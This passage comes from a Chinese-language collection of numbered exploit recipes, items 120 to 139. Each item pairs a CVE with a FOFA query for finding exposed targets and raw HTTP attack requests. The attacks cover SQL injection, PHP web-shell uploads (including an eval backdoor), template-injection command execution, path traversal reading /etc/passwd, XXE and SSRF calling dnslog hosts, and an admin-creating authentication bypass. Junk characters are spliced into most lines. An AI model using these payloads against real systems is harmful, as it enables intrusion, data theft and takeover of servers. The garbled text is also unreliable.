% B) j, g. M1 w6 b& X: X% ]6 ?X-Remote-Ip: 1.1.1.1
, D: {2 i; T: l) ?! I; ~* SX-Remote-Addr: 1.1.1.16 y/ _, F2 t5 I' j4 ?0 B
Te: trailers$ v, P1 L" J& b6 M
Connection: close
% ? W |1 i2 t2 p4 n
# A7 L1 P9 I. }/ ^4 l- ^# Msrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456 d# g7 i! E. \- H3 v: g9 R
* ~6 S: @8 K- A, Y5 S
/ q& L* \; ?" i2 z7 S0 v4 a
120. 北京百绰智能S40管理平台导入web.php任意文件上传
( u7 D7 h$ _/ J3 K$ BCVE-2024-1253. H# d) L2 l K& {
FOFA:title="Smart管理平台"' ^8 o# n" R& x
POST /useratte/web.php? HTTP/1.1
6 T! d1 F5 ^+ M6 m6 ?Host: ip:port9 }# H3 j4 ~ T. s( T1 A" A
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db! j7 f& M! J9 W0 _0 U" z4 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" a5 J& N& P, [: X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& h; S2 i/ j2 E- G4 y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 y* h6 A2 Q; c' |% AAccept-Encoding: gzip, deflate
# M \+ d5 J. ]% o2 x/ V* aContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
- F# ?; v% l: x/ \4 XContent-Length: 597, ?( a$ H$ V% Y8 Z* K2 A$ Y9 {
Origin: https://ip:port& T! ^- c7 [8 U8 ]
Referer: https://ip:port/sysmanage/licence.php, F' y/ U p8 `' F( ?3 g
Upgrade-Insecure-Requests: 1
; l* U- C( W; z* c' sSec-Fetch-Dest: document
* T! V. Y+ y4 BSec-Fetch-Mode: navigate
6 u, ?9 c5 d8 y! FSec-Fetch-Site: same-origin
1 @7 K$ y$ J% P ]) @Sec-Fetch-User: ?1
E* J( |1 |3 |$ A- C- ZTe: trailers
) {. g, e. {9 I- E( ]' aConnection: close
7 O- K7 n4 L% w- [/ e6 C) k5 E& Y
5 p2 g% B( ]7 y* {# ]9 `, p" z-----------------------------42328904123665875270630079328
( Q( O3 T6 q6 n! EContent-Disposition: form-data; name="file_upload"; filename="2.php"
+ `) L/ m O3 z4 c% X7 yContent-Type: application/octet-stream+ @: z/ c0 T f0 v; Z
4 K! A: N5 n( q9 ]" Q+ O2 T<?php phpinfo()?>
- E" J& z) |9 R' G7 z; D: n-----------------------------423289041236658752706300793289 `0 y) K) r# L$ v
Content-Disposition: form-data; name="id_type"' t% S6 P! z: x; I5 t6 K; V
8 i3 A. j6 k Q1
i1 V' V( c/ P3 r5 V1 N8 p5 f9 C-----------------------------42328904123665875270630079328; {2 W. s: Q9 R8 C I; w7 ~
Content-Disposition: form-data; name="1_ck"4 f" ~ p. J3 @7 q+ Z! T! `# M
. v3 I F7 n4 W% M
1_radhttp
% S! L* e' [* p% l9 P( Q* R-----------------------------42328904123665875270630079328! U, X) s6 ]- L
Content-Disposition: form-data; name="mode"
4 P' B s) E6 }; w# M0 Z+ k" z5 H: A K
import
6 H& c i( x0 Z9 M6 D-----------------------------42328904123665875270630079328
8 w' l8 H, V9 P2 ~+ u9 i7 ^3 u8 G7 s2 }$ E% a- A) _% Q
0 y V4 y& x+ k1 `: P. D
文件路径/upload/2.php4 m. O+ k' D& ^5 o' m$ Y
( g6 W% t9 Z# {# S; k) K! r1 p
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
6 g* Q# S n! HCVE-2024-1918( g6 p0 q5 K' G1 F
FOFA:title="Smart管理平台"
- |' |$ c/ O7 i3 }" nPOST /useratte/userattestation.php HTTP/1.1
8 {2 G5 {# R% F. S. g) f! g" ?Host: 192.168.40.130:8443
- l8 K) }! b5 ^+ WCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac500 H0 g9 d3 ]0 d7 T) x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko! [, k4 Q: F' a5 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 u) u2 V- e" y+ I! E* qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 m- G2 T: h0 e) j6 k3 zAccept-Encoding: gzip, deflate3 j# e* v- \+ z' I8 H8 V' ^6 w
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793285 h: i4 i% {8 {3 G0 Z$ r
Content-Length: 5922 `' _7 a0 T2 d& `0 m s
Origin: https://192.168.40.130:8443
. _% J4 }. x' S' RUpgrade-Insecure-Requests: 16 u1 v: j9 R. v9 ?8 A+ U" I/ \
Sec-Fetch-Dest: document6 ~% }& d/ z( q! Q5 b ~
Sec-Fetch-Mode: navigate
: _1 l8 H! @. bSec-Fetch-Site: same-origin
' q4 Y, \ |* s" k. mSec-Fetch-User: ?1
, R+ F) b. t$ K- b2 e, MTe: trailers2 f& P8 L7 s8 V2 _' T1 P. o
Connection: close( y6 i# U, W6 M) a9 ]
. o J+ r' K [% N D& s
-----------------------------42328904123665875270630079328
( |- V, P D9 D6 F& M0 ?2 _+ HContent-Disposition: form-data; name="web_img"; filename="1.php"
7 \. P }$ f4 ^( q4 BContent-Type: application/octet-stream
& ^9 Z/ k9 y7 T
7 e- b& d5 I% Z q5 v3 `+ T+ \1 w<?php phpinfo();?>. r8 W6 x9 U. M+ f( L
-----------------------------42328904123665875270630079328
: x- s- T" Z K! \( b9 TContent-Disposition: form-data; name="id_type"
2 q0 I8 V( C2 `0 N5 ^2 _
, p5 h" B! u" W( R1* z- `$ Q: C3 }
-----------------------------423289041236658752706300793287 ], M$ E0 X. [
Content-Disposition: form-data; name="1_ck"! Y! \+ j8 V+ I, I ~ a
! w2 t. s0 Y# _: Y% h1_radhttp
- ]9 ]5 T. S0 U-----------------------------42328904123665875270630079328
, ?* d' Z2 Q* h T) w2 n4 c0 ?Content-Disposition: form-data; name="hidwel"
. }) U0 X+ ~7 v- o( @6 {4 |
& {) ? u/ S, m, S0 U* f+ `! Y+ Sset
: o. N: A6 h/ a-----------------------------42328904123665875270630079328
5 f$ `: t0 F$ t, ~: g/ L6 ~4 N0 u+ e
0 R8 e! R9 l8 d' F4 u9 i0 P: p7 P/ t; u3 O
boot/web/upload/weblogo/1.php
0 W, i3 U2 l+ w. A7 B' R7 Y- c% e3 `0 o w ~% V/ S; @
122. 北京百绰智能s200管理平台/importexport.php sql注入
# n% t( A' C: z3 RCVE-2024-27718FOFA:title="Smart管理平台"
. G; }* \6 V7 V; v; {# B其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()2 x* m1 V# A2 q" y4 _
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1 A& P" p. p4 g
Host: x.x.x.x; ] z5 B* X3 t8 D* n3 G- \9 Q6 i
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0" s! X* e q( F1 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 z5 ` G9 n$ l2 u; I# i) J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 w$ @$ p# {: K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 t. j8 c" V8 G( [6 V; oAccept-Encoding: gzip, deflate, br
! R! S$ ^; ^$ C0 P8 EUpgrade-Insecure-Requests: 1
6 C& g8 L: |$ ESec-Fetch-Dest: document5 j" c7 t* m& s! U4 R
Sec-Fetch-Mode: navigate
) ]( {# U& ~ i% q+ [Sec-Fetch-Site: none; t$ f; s( ^3 r" V9 p
Sec-Fetch-User: ?1
\/ ]) g( K, p j0 o9 CTe: trailers$ I; b: y. W; O; w* a
Connection: close
/ L9 ~* ^1 ?0 E' a- l% k" D8 ]9 |. H7 a5 x1 n
2 B i2 G ^$ O1 N* @! ^123. Atlassian Confluence 模板注入代码执行. n8 }5 X1 M% S0 \# d
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"3 G' D1 H# @6 U/ ^# Z7 i' c
POST /template/aui/text-inline.vm HTTP/1.1' @1 s+ i4 U0 v5 P9 r' f2 ^2 O
Host: localhost:8090
2 V( M1 a' |' X3 C: d! |; y0 OAccept-Encoding: gzip, deflate, br H( ^4 ?& i; j( e1 {
Accept: */*
! e+ N( r9 [# u MAccept-Language: en-US;q=0.9,en;q=0.8
' L, d5 N9 ?, PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
/ F+ W0 ?# Z0 ^1 V- xConnection: close- w4 e0 R3 y8 m5 l
Content-Type: application/x-www-form-urlencoded" ~+ r! H% \) F, Q; A6 {$ ^7 k: s
7 R2 q) d) f& C: W. F$ e& m# t% |label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})): s; ^+ H$ |+ F+ U; a
! W% J' u& E/ [
# F# D, a0 t! G" H# p. N) ~) ^/ T124. 湖南建研工程质量检测系统任意文件上传
. p, l D4 b. }7 WFOFA:body="/Content/Theme/Standard/webSite/login.css"- e3 h7 x- h9 b
POST /Scripts/admintool?type=updatefile HTTP/1.1' p; C; F' _+ X) i, u' J; P$ d5 B
Host: 192.168.40.130:8282' F7 B" h: }# O8 \) P
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
/ `2 g( ]9 c yContent-Length: 72
$ b* Z% L2 n- I$ A, fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8, B( L3 ~8 I% l, M' f
Accept-Encoding: gzip, deflate, br
) t+ ^; T" E, X5 U0 t+ r0 G. a3 J5 rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 | Z2 p1 y3 P% x1 \
Connection: close' b- T8 m3 j; t- Q0 j
Content-Type: application/x-www-form-urlencoded
- k" G/ I P: R5 @$ L2 G2 J& s/ l' I) T2 [& X8 n/ k5 S8 N
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>' [3 i' I) S/ M- n6 K% K9 n
* s4 [5 p" N4 l1 Y
% {) C/ u/ t5 G
http://192.168.40.130:8282/Scripts/abcgcg.aspx
7 P- V* r, ?. g* ]) ?, r- Y# v: W1 B5 M
125. ConnectWise ScreenConnect身份验证绕过
0 S g* ]6 n2 ?8 d& M4 e7 HCVE-2024-17093 X$ }& i/ r) F8 D
FOFA:icon_hash="-82958153"7 e4 x0 S# J9 {% c; G' e' U" w6 F4 r
https://github.com/watchtowrlabs ... bypass-add-user-poc
1 |/ f' G" t( B/ y; e* N/ a3 A6 k& N/ I7 V& T( u
2 N2 Q8 w [6 R/ o/ D使用方法
; S. ?' \6 O% Y; Y, ^python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
3 \) Q1 }0 d8 D8 B% C- P
! a+ V5 g p8 B7 R5 c' n- Z( N
{% y/ P9 J; o9 S1 q7 C5 ?& g创建好用户后直接登录后台,可以执行系统命令。: j9 E2 m9 V' V3 a( V& t0 E5 Z6 K
( ~/ L# ?; }0 U) `8 \7 b: i0 v126. Aiohttp 路径遍历
" @+ ^% K1 l" n" e4 G( P; UFOFA:title=="ComfyUI"1 N* x# A( E- [5 b9 k. B, B. p2 y
GET /static/../../../../../etc/passwd HTTP/1.1
( v( ?7 k2 b- z, E ^. w) T& BHost: x.x.x.x ^4 v+ y8 s9 j& h" i' ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
1 t3 M7 q/ y1 L1 V- NConnection: close( O$ z9 O% M" E# x, _% q$ K
Accept: */*
0 X( S( ?+ b) a2 y) AAccept-Language: en) V# F8 b2 ?: O$ x' |
Accept-Encoding: gzip" D+ g9 Z( [/ j8 R( c
& J7 Q) o9 O& K4 ]) ? q( [- R' i
5 R3 _* x e) C) T" ?. j% ^$ Y+ I
127. 广联达Linkworks DataExchange.ashx XXE
& _ i: \+ y: r' e$ Y: ^; OFOFA:body="Services/Identification/login.ashx" : A8 C3 j0 G. z6 H" L+ i$ }
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
3 B9 G1 u0 H: i' p2 { @Host: 192.168.40.130:8888
" v4 a6 a$ M" JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36. n0 m; R/ X* Y
Content-Length: 415
( H% T1 s- S7 h5 s" S) p9 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" |, x) R6 p4 F4 Q6 R
Accept-Encoding: gzip, deflate
+ S; k, d( P. t: \Accept-Language: zh-CN,zh;q=0.9
! M! W7 e$ |1 ~4 MConnection: close
- h5 v) r% G: |" Q. O* N$ X7 MContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
& b" {& ]" D2 w `, b% SPurpose: prefetch' m6 c; y5 d& c7 p0 L2 f
Sec-Purpose: prefetch;prerender# X. z* {: L1 c( b
9 m9 K" T) B! y* x: w
------WebKitFormBoundaryJGgV5l5ta05yAIe07 i* z' I3 [. c$ M3 b9 S
Content-Disposition: form-data;name="SystemName"/ ~* e2 p) v8 N5 `. P
) M+ a- |- C* w2 @1 hBIM8 u1 t& {6 `1 ~! X8 W6 J
------WebKitFormBoundaryJGgV5l5ta05yAIe0! i9 K; a, a9 o
Content-Disposition: form-data;name="Params"
7 S. b" o7 x4 Q* o7 `3 S9 SContent-Type: text/plain/ c7 m4 X: h* `* s+ B2 _1 ~1 i
9 x4 P* z/ y( i( L' s
<?xml version="1.0" encoding="UTF-8"?>
" y: R d- i( t<!DOCTYPE test [/ i8 d5 v1 P" `
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
' X/ H0 G" ?1 E* `& a* H8 r]7 {; F- L/ J* ~
>
: l! Z7 Y2 f2 L3 c7 @8 B<test>&t;</test>
$ w0 b7 n4 K# L4 i+ g$ h------WebKitFormBoundaryJGgV5l5ta05yAIe0--
& V! H2 |- O6 X4 ?) L$ K1 T' [6 e' y& S6 F" j4 Z; r2 p2 a, D/ ]
. Y+ {! l8 z9 C9 R% r+ s
- c) s9 {# B# x: w& N/ Q* t128. Adobe ColdFusion 反序列化
9 x: Z& s: s# M+ uCVE-2023-38203
6 Q2 O6 ~( o+ D' Q) {Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)! j6 t- w, O% S8 g7 q
FOFA:app="Adobe-ColdFusion"
$ u1 H; H0 i7 hPAYLOAD
# z$ ~+ x. ~+ v- O9 u" T* w6 b' ?# D* S4 O; ?
129. Adobe ColdFusion 任意文件读取
8 J4 v5 c& U: e5 OCVE-2024-20767
! U7 @, p) v, K9 e, @6 QFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"% w4 ?' ]/ Z+ L% O5 j5 M1 q/ u
第一步,获取uuid( S# j& c: B; ~% Z: D
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
# U/ F j0 m' I7 N& H0 lHost: x.x.x.x* p5 o0 S* _% ^2 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.366 I$ {! J5 _8 A8 K
Accept: */*- M$ Y" r- N' F' N. h ?5 S, h
Accept-Encoding: gzip, deflate
; D: X+ K+ j& M& [4 g* ~% T1 \' VConnection: close' d; e2 N( D2 v9 C# U7 y
6 V; @4 N1 j7 q6 V- q# K1 l
' U2 u# A3 ]2 L, S6 n" S第二步,读取/etc/passwd文件7 x) C* _$ T" l( |4 ?0 M/ `0 G
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.10 l: l. _* r6 z, I4 [! T3 B0 V
Host: x.x.x.x, y9 A& H: Q7 E! V! X( ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ A7 q7 k8 u+ W/ kAccept: */*
! U: _" W. w4 g3 a/ r; ]Accept-Encoding: gzip, deflate
3 ?3 S- ~) W6 I# s" ~0 Q+ w, h0 u" r aConnection: close
5 r2 [- I4 t u# ]uuid: 85f60018-a654-4410-a783-f81cbd5000b9
* ?3 f2 T) m' j
9 T4 \% l9 G2 K+ q, z2 h; I& `2 K9 D( s
130. Laykefu客服系统任意文件上传3 A! C, D/ A& [( {
FOFA:icon_hash="-334624619"
0 F7 L! e v: d$ @POST /admin/users/upavatar.html HTTP/1.1
- U( _& N2 z$ O2 ~2 CHost: 127.0.0.16 F6 X# _9 T) f2 n
Accept: application/json, text/javascript, */*; q=0.01# d8 v; v8 Z8 l, j2 ?+ z q
X-Requested-With: XMLHttpRequest
/ K9 v& {) \) _* w. L6 WUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26- ^& n( h& |8 C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR# Q/ S. Y( D! r" x I' a% |& C
Accept-Encoding: gzip, deflate
9 [, j1 X5 \5 D* Q' tAccept-Language: zh-CN,zh;q=0.9( N4 t% I; e% s( J( o. B
Cookie: user_name=1; user_id=3: G4 r8 O/ Z U$ Q5 w% Z- Q
Connection: close7 _6 p+ \( {" B' w2 D, x* X
* |9 M& _) w* V------WebKitFormBoundary3OCVBiwBVsNuB2kR
) T) `9 X9 ^3 C4 e9 q5 bContent-Disposition: form-data; name="file"; filename="1.php"" c- U' ~, m3 U. ?) G
Content-Type: image/png
, I( S( y0 t3 q0 x# w0 @, b% r
- ]$ j' r2 ~5 W& k0 _% G! c<?php phpinfo();@eval($_POST['sec']);?>7 P/ h- u4 z% l. r5 Y4 u3 y2 \
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
- ~/ f8 O3 o2 w h- h" z
0 k$ Y) I0 m! v; _
4 G* A0 Z9 Q' t9 d) j) r- Q$ i8 V131. Mini-Tmall <=20231017 SQL注入
8 _ V8 B1 a- M2 EFOFA:icon_hash="-2087517259"
3 o2 e# Q; p, W* c后台地址:http://localhost:8080/tmall/admin; `! P% N! m5 V" F! [
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
4 q# p" F. u6 z8 W
, N/ o0 l2 ^3 {7 D132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过! i0 z4 S: i& X3 b
CVE-2024-27198& n' V5 W' V$ E+ }1 V) e
FOFA:body="Log in to TeamCity"0 y, _# N) v8 I D) U% @
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.11 v# q2 I! L+ U; l- Q6 f+ R
Host: 192.168.40.130:8111
# r- w3 ^: z( M$ p4 }; A& ?2 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; L6 S; Y$ X# n7 a1 t' I# [
Accept: */*( A, [7 _4 U9 `. T) S1 y
Content-Type: application/json2 z1 f: o; J7 `, Z1 ~0 g
Accept-Encoding: gzip, deflate
$ y. [: V! K9 o) Q" R$ d* c! U. J
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}} f& |% T# n* b/ e* w$ r! a" G
! E4 g) O: ]8 o4 k+ |! o0 G. |( B1 K& P3 s$ d5 R: F
CVE-2024-27199
; _* X/ u* E; E/res/../admin/diagnostic.jsp% ~# @5 P# @9 Y' Q
/.well-known/acme-challenge/../../admin/diagnostic.jsp7 a6 P" p$ U7 d$ H2 Z% |9 \4 b
/update/../admin/diagnostic.jsp
# C8 O* y* @$ M; x: I" m# J
) b, l# x* S. n& s- B/ j! ?3 `* m7 e6 d* Y; T) l% u
CVE-2024-27198-RCE.py
6 k+ e/ P9 _' P3 C+ M6 B) S5 T9 K: O; B3 K
133. H5 云商城 file.php 文件上传
- I* M S3 g g3 p0 i' ]9 }9 g' qFOFA:body="/public/qbsp.php"4 t+ a1 C8 |+ I
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
/ Z. O+ N4 `8 ]6 OHost: your-ip# X$ m, b) P& C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.362 v3 k* H3 ~) G# s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx7 a' n* F) e; p4 ~* ^
5 G/ I8 \8 b& O( G# I$ n9 D1 h" d
------WebKitFormBoundaryFQqYtrIWb8iBxUCx4 ?- k+ a; Z! X% q6 o
Content-Disposition: form-data; name="file"; filename="rce.php"- I5 ]5 L* V* k3 Z; F- {; Q
Content-Type: application/octet-stream
1 v8 o+ n1 T( C6 ?7 ^0 z( G
d$ V1 B) X& }' i- x4 ^<?php system("cat /etc/passwd");unlink(__FILE__);?>
, G8 Z& ?8 ~8 p2 {; U) o------WebKitFormBoundaryFQqYtrIWb8iBxUCx--- ~, n5 R, V) S$ D
0 i! f6 I( a* D/ l: d8 i; v; K- e- z% D9 c( c; |
8 q( P$ N7 }3 K$ g9 u/ b: a134. 网康NS-ASG应用安全网关index.php sql注入) i% o4 u, a- @
CVE-2024-2330
, v( [ |! B8 v4 f8 \- H# j& Y+ LNetentsec NS-ASG Application Security Gateway 6.3版本, Q. Z- m# X `! Z
FOFA:app="网康科技-NS-ASG安全网关"/ `4 A3 v6 m& O- z& g
POST /protocol/index.php HTTP/1.1
8 Z( o5 n' A8 {# X5 l% IHost: x.x.x.x
, N# h6 p3 ]0 ~Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
% w7 H6 j; _( @/ o( Y; W6 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
! }- F! [ {0 P9 HAccept: */*
% m: r$ a$ Q2 k/ FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) W8 A% {0 Z; c3 [" F1 a; gAccept-Encoding: gzip, deflate
/ s$ M3 X& Z9 F7 nSec-Fetch-Dest: empty
0 @ g0 i2 a* m, R$ XSec-Fetch-Mode: cors0 t5 s. F" s! W$ |- U5 S2 M" W
Sec-Fetch-Site: same-origin6 B3 v ~" f1 y$ ?3 C) O# Z m1 k
Te: trailers5 m/ `1 i% @2 B
Connection: close1 C' B! o+ f3 y# _8 Z' E
Content-Type: application/x-www-form-urlencoded
' n- @! S$ }6 w( {2 u3 [Content-Length: 263
0 {. q8 ]* K2 [% P
* A }) Y9 e0 e1 ejsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
5 P( M4 U& g* r# c [5 j( u2 U$ ~
: s( O' ~/ _& @3 ]* t" n8 L2 c+ J' Y; ?" h8 N& O; P- n
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入& t+ `7 k3 `7 L6 X7 H) N2 b
CVE-2024-2022) j2 R$ `) a. j! z, x
Netentsec NS-ASG Application Security Gateway 6.3版本
$ E+ A9 [1 p4 |* D Q( M' HFOFA:app="网康科技-NS-ASG安全网关"
7 `# S, h8 y! U8 U5 Z( y! b+ K, HGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
; F4 d1 Q# E) v! r7 KHost: x.x.x.x
1 e& G* v1 a N% {5 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( V* f6 [! z0 u0 h* x3 y& R) U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! `. l- k! Z. d# y; e4 K% [6 vAccept-Encoding: gzip, deflate
- \/ @) X2 B' J; d3 UAccept-Language: zh-CN,zh;q=0.9, o5 E* {4 A- j2 H
Connection: close. B) ]: y6 b1 M& I+ E) |
, M$ q5 e/ y1 f9 T
) K$ S X, Q& v6 M136. NextChat cors SSRF
7 ?, N6 d0 ?7 [7 N, S( ACVE-2023-49785+ d- m" ^& C4 m! Y, _% e
FOFA:title="NextChat"3 x X# |: j5 @& g- f$ P. @
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
( F8 m5 N0 \' g! q4 j! pHost: x.x.x.x:10000
' w, U& _/ j& c0 W# F# R. yUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 d3 e' I* r3 K" u* ^! R6 y" o' c3 c
Connection: close8 `- Q7 U4 ^) ^
Accept: */*- L4 G" L% E# V( q
Accept-Language: en
u. W) @. Y% W: ^* |Accept-Encoding: gzip7 m' j( B" T4 l+ X0 W3 C( c) s \
2 j6 N/ V. h- R) N
: A- ~$ M4 [5 Z' u137. 福建科立迅通信指挥调度平台down_file.php sql注入; [* G5 `# T2 a5 M
CVE-2024-2620
5 g8 n- j: o2 ~FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
, J4 @# j Y O5 SGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
; o6 B' W$ c4 P5 P% x5 [. c3 n, _Host: x.x.x.x# S& c6 I* H2 c r- F. B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
0 ~" ~( e" e; }, W% M$ aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) |7 u F' J. V6 O7 \( M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 J1 x6 u% [2 }4 s3 `- k
Accept-Encoding: gzip, deflate, br
5 i4 ^. \9 l5 j7 j4 R) MConnection: close' ` Z. L9 i+ z5 ^5 t& N5 x7 H' r# m
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj* Q) g5 O1 s6 ^& X( V# g
Upgrade-Insecure-Requests: 1# z* G- G. T) ~ r6 Q4 Y
' E3 `+ k' d7 H: m! }( _& N
$ E' J ]$ m8 d, F138. 福建科立讯通信指挥调度平台pwd_update.php sql注入& e; ?6 F# D+ }+ G8 {
CVE-2024-2621
" o( ^6 p R5 N. O' sFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"7 Q! \- P& O' m5 c- _
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1: U* Z: m4 X1 }2 ?+ x- G5 U
Host: x.x.x.x( _! S8 F4 A. p5 @1 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 N& e3 U8 w' W) x9 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) e& [- P3 {4 D4 {2 U2 {+ A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 ^, o. q- A* D" F
Accept-Encoding: gzip, deflate, br
8 `$ B7 @5 R( l; n) ~ m% V7 v4 XConnection: close+ m Z7 Z" J+ m: y
Upgrade-Insecure-Requests: 18 ]: a( X* n8 Z$ r
; v6 w. G1 h7 a6 n
p& R# @2 l* N: f, j! M139. 福建科立讯通信指挥调度平台editemedia.php sql注入
, d. b# w7 Y e2 v& TCVE-2024-2622+ x: L4 g6 \! o0 T# V
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
